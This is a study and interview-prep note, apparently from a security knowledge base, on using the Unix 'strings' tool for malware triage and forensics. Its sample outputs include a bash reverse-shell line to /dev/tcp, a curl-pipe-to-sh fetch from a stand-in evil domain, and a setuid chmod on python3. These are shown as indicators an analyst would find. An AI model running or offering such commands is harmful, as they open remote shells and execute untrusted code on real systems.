strings
strings
One-liner: Unix utility that extracts printable character sequences from binary filesβessential for malware analysis, forensics, and reverse engineering to uncover hardcoded data like IPs, URLs, or commands.
π― What Is It?
strings is a command-line tool that scans binary files (executables, memory dumps, images) and prints human-readable text sequences, typically 4+ characters long.
Use Cases:
- Malware analysis: Find C2 domains, encryption keys, file paths
- Forensics: Extract metadata from unknown binaries
- Reverse engineering: Identify function names, error messages
- Data recovery: Search for text in corrupted files
Available on: Linux, macOS (native), Windows (via Sysinternals)
π¬ How It Works
Basic Concept
βββββββββββββββββββββββ
β Binary File β
β (non-human data) β
βββββββββββββββββββββββ€
β 0x48 0x65 0x6C 0x6C β βββ
β 0x6F 0x20 0x57 0x6F β β strings extracts
β 0x72 0x6C 0x64 0x00 β β "Hello World"
β 0xC3 0x7A 0x9F ... β βββ (skips binary junk)
βββββββββββββββββββββββ
Usage Syntax
strings [options] <file>
Common Options
# Basic usage
strings suspicious.exe
# Minimum string length (default 4)
strings -n 8 malware.bin # Only show 8+ char strings
# Show file offsets (hex)
strings -t x malware.bin # Useful for correlating with disassemblers
# Search both ASCII and Unicode
strings -e l suspicious.exe # Little-endian Unicode (Windows)
strings -e b suspicious.exe # Big-endian Unicode
# Filter output
strings malware.bin | grep -i "http" # Find URLs
strings malware.bin | grep -E "^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$" # IPs
π‘οΈ Detection & Investigation Use Cases
Malware Analysis (from writeup context)
Extract C2 Infrastructure
# Find hardcoded IPs and domains
strings suspicious.elf | grep -E "([0-9]{1,3}\.){3}[0-9]{1,3}"
192.168.1.100
10.10.77.45
strings suspicious.elf | grep -E "[a-zA-Z0-9.-]+\.(com|net|org|xyz)"
evil-domain.com
c2server.xyz
Identify Embedded Scripts
# Look for shell commands
strings rootkit.so | grep -E "(bash|sh|curl|wget|nc)"
/bin/bash -i >& /dev/tcp/10.10.77.45/4444 0>&1
curl http://evil-domain.com/payload | sh
Find Suspicious Function Names
# Common malware indicators
strings malware.bin | grep -i -E "(inject|hook|keylog|decrypt|backdoor)"
InjectProcessMemory
HookWindowsAPI
DecryptPayload
Forensic Investigation
Analyze Unknown Binary (from writeup)
# From Task 6: Investigating suspicious binary
strings /tmp/.hidden/suspicious_binary | head -20
# Typical findings:
# - Hardcoded file paths: /home/jane/.ssh/authorized_keys
# - Network indicators: 192.168.1.100:8080
# - Debug messages: "[+] Backdoor installed successfully"
Extract Metadata
# Compiler info, build paths
strings binary.elf | grep -i "gcc"
GCC: (Ubuntu 11.3.0-1ubuntu1~22.04) 11.3.0
# Copyright, version strings
strings app.exe | grep -i "copyright"
Copyright (C) 2024 AttackerGroup
Search Memory Dumps
# Extract credentials from memory
strings memory.dmp | grep -i "password"
strings memory.dmp | grep -E "[A-Za-z0-9+/]{40,}={0,2}" # Base64
π Practical Examples
Example 1: Investigate Suspicious ELF (Linux)
# Full analysis workflow
strings /tmp/suspicious.elf > strings_output.txt
# Check for network activity
grep -E "([0-9]{1,3}\.){3}[0-9]{1,3}|https?://" strings_output.txt
10.10.77.45
http://malicious-site.com/payload
# Check for file operations
grep -E "(/etc/|/home/|/tmp/|/var/)" strings_output.txt
/etc/passwd
/home/jane/.ssh/authorized_keys
# Check for privilege escalation
grep -i -E "(sudo|suid|root|chmod)" strings_output.txt
chmod +s /usr/bin/python3
Example 2: Windows Malware Analysis
# Use Sysinternals strings.exe
strings.exe -accepteula malware.exe | findstr /i "http"
# Or on Linux analyzing Windows binary
strings malware.exe | grep -i "http"
https://c2-server.com/callback
http://pastebin.com/raw/a1b2c3d4
Example 3: Image File Forensics
# Extract hidden data from image (steganography)
strings suspicious.jpg | grep -v "JFIF"
# May reveal hidden messages, URLs, credentials
π€ Interview Angles
Common Questions
-
"What is the strings command and when would you use it?"
- "strings extracts human-readable text from binary files. I use it during malware analysis to quickly find IOCs like hardcoded IPs, domains, file paths, or encryption keys without full reverse engineering."
-
"How does strings help in incident response?"
- "When analyzing unknown binaries during IR, strings provides fast initial triageβrevealing C2 infrastructure, malicious commands, or persistence mechanisms. It's non-invasive and works on any file format."
-
"What are the limitations of strings?"
- "It only finds plaintext dataβencoded, encrypted, or obfuscated strings won't appear. Minimum length default is 4 characters (can miss short strings). False positives common in binary noise."
STAR Story
Situation: SOC alert flagged suspicious process execution on Linux server; unknown binary in
/tmp/.hidden/with obfuscated filename.
Task: Rapidly assess binary's purpose and identify IOCs without time-consuming full reverse engineering.
Action: Extracted strings from binary:strings /tmp/.hidden/suspicious_binary | tee analysis.txt. Found hardcoded IP10.10.77.45and suspicious strings:/home/jane/.ssh/authorized_keys,chmod 666, and base64-encoded SSH public key. Cross-referenced IP with threat intel (known C2). Identified binary as SSH backdoor installer targeting Jane's account.
Result: Contained threat within 15 minutesβblocked C2 IP at firewall, removed binary, fixed authorized_keys permissions. strings provided instant IOCs without needing IDA Pro or Ghidra.
β Best Practices
- Combine with grep: Filter output for specific patterns (IPs, URLs, file paths)
- Adjust minimum length: Use
-n 6or-n 8to reduce noise - Check Unicode: Windows binaries often use UTF-16 (use
-e l) - Save output: Redirect to file for offline analysis (
strings binary > output.txt) - Cross-reference IOCs: Match findings against threat intel feeds
- Use with other tools: Pair with
file,hexdump,objdumpfor comprehensive analysis - Automate searches: Create regex patterns for common indicators
π§° Cheat Sheet
# Basic extraction
strings <file> # Default (4+ char ASCII)
strings -n 8 <file> # 8+ characters only
strings -a <file> # Scan entire file (not just data sections)
# Encoding options
strings -e s <file> # Single-byte (ASCII)
strings -e l <file> # Little-endian UTF-16 (Windows)
strings -e b <file> # Big-endian UTF-16
strings -e L <file> # Little-endian UTF-32
# Output formatting
strings -t x <file> # Show hex offsets
strings -t d <file> # Show decimal offsets
strings -o <file> # Show octal offsets (deprecated)
# Forensic patterns
strings <file> | grep -i "password" # Find passwords
strings <file> | grep -E "^[0-9.]+:[0-9]+" # IP:port patterns
strings <file> | grep -i "http" # URLs
strings <file> | grep -E "^/[a-z/]+" # Unix paths
strings <file> | grep -E "C:\\" # Windows paths
# Advanced workflow
strings -e l malware.exe | sort | uniq | grep -v "^[A-Z]$" > clean_strings.txt
β Common Misconceptions
- "strings finds all data in a binary" (False: only printable ASCII/Unicode; misses encoded/encrypted data)
- "strings output is 100% accurate" (False: can show random byte sequences that look like textβcontext matters)
- "Only works on executables" (False: works on any fileβPDFs, images, memory dumps, disk images)
- "Malware always has obvious strings" (False: modern malware uses obfuscation, encryption, or dynamic string generation)
π Related Concepts
- Static Analysis β strings is a static analysis technique
- Malware Analysis β Core tool for initial triage
- Indicators of Compromise (IOCs) β strings extracts IOCs from binaries
- Reverse Engineering β strings complements tools like IDA Pro, Ghidra
- Digital Forensics β Used in memory forensics, disk analysis
- Command and Control (C2) β strings reveals C2 infrastructure
- Obfuscation β Advanced malware defeats strings with encoding